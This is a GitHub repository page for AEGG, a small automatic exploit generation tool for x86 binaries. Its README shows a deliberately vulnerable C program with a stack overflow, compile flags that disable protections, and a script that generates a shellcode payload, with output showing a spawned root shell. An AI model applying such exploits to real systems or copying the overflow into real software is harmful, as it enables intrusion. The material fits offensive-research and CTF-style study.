my automatic exploit generation
Clone or download
Latest commit 2783488 Jun 21, 2016
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
exploits Fixed rop env LD_LIBRARY_PATH Jun 20, 2016
.gitignore Initial package Jun 13, 2016
LICENSE Initial commit Jun 18, 2016
README.md Modified Usage in README.md Jun 21, 2016
__init__.py Modified README and added exception in analyzer Jun 18, 2016
aegg.py Completed rop Jun 19, 2016
analyzer.py Fixed rop env LD_LIBRARY_PATH Jun 20, 2016
bug_finder.py Modifying ROP Jun 18, 2016
exploit.py Completed rop Jun 19, 2016
exploiter.py Completed rop Jun 19, 2016
payload.py Completed rop Jun 19, 2016
verifier.py Completed rop Jun 19, 2016

README.md

AEGG

AEGG is my simple automatic exploit generation tool. Now only support x86 binary.

Usage

  1. vi vul.c:
    #include <stdio.h>
    #include <unistd.h>
    #include <string.h>
    
    char buf[100];
    
    int sample_func() {
        char name[10] = {0};
        read(0, buf, 307);
        strcpy(name, buf);
        printf("input: %s\n", name);
    }
    
    int main(void)
    {
        printf("Running...\n");
        sample_func();
        printf("Done.\n");
    }
    
  2. complie vul:
    gcc vul2.c -o vul2 -m32 -g -z execstack
    
  3. vi my_aegg.py:
    from aegg import AEGG
    
    binary = './vul'
    gg = AEGG(binary)
    
    # generating payload!
    gg.hack()
    
    print repr(gg.payloads[0].content)
    gg.save()
    

Result

$ python my_aegg.py
...
INFO    | 2016-06-18 00:10:11,717 | aegg.aegg | Start hacking ...
INFO    | 2016-06-17 23:44:43,872 | pwnlib.elf | Stack is executable!
[+] Started program './vul'
INFO    | 2016-06-17 23:44:46,974 | pwnlib.tubes.process | Started program './vul'
[*] Stopped program './vul'
INFO    | 2016-06-17 23:44:47,976 | pwnlib.tubes.process | Stopped program './vul'
INFO    | 2016-06-17 23:44:47,980 | aegg.aegg | Generated!
INFO    | 2016-06-17 23:44:47,980 | aegg.aegg | Completed.
$
$ (cat ./vul.exp; cat) | ./vul
Running...
input: jhh///sh/bin��1�j
                           �̀ÿ @@   @
id
uid=0(root) gid=0(root) groups=0(root)

Dependences

  • angr
  • pwntools

TODO

  • shellcode (ret2stack)

  • ROP (ret2libc)

  • ROPgadget

  • fmtstr exploit

  • AEGG: inputs in exploit_gen instead of paths (for fuzzing)

  • ret2stack: try every buffer

  • ret2stack: nop-sled

Reference

angr-doc/examples/insomnihack_aeg

(State of) The Art of War: Offensive Techniques in Binary Analysis

AEG: Automatic Exploit Generation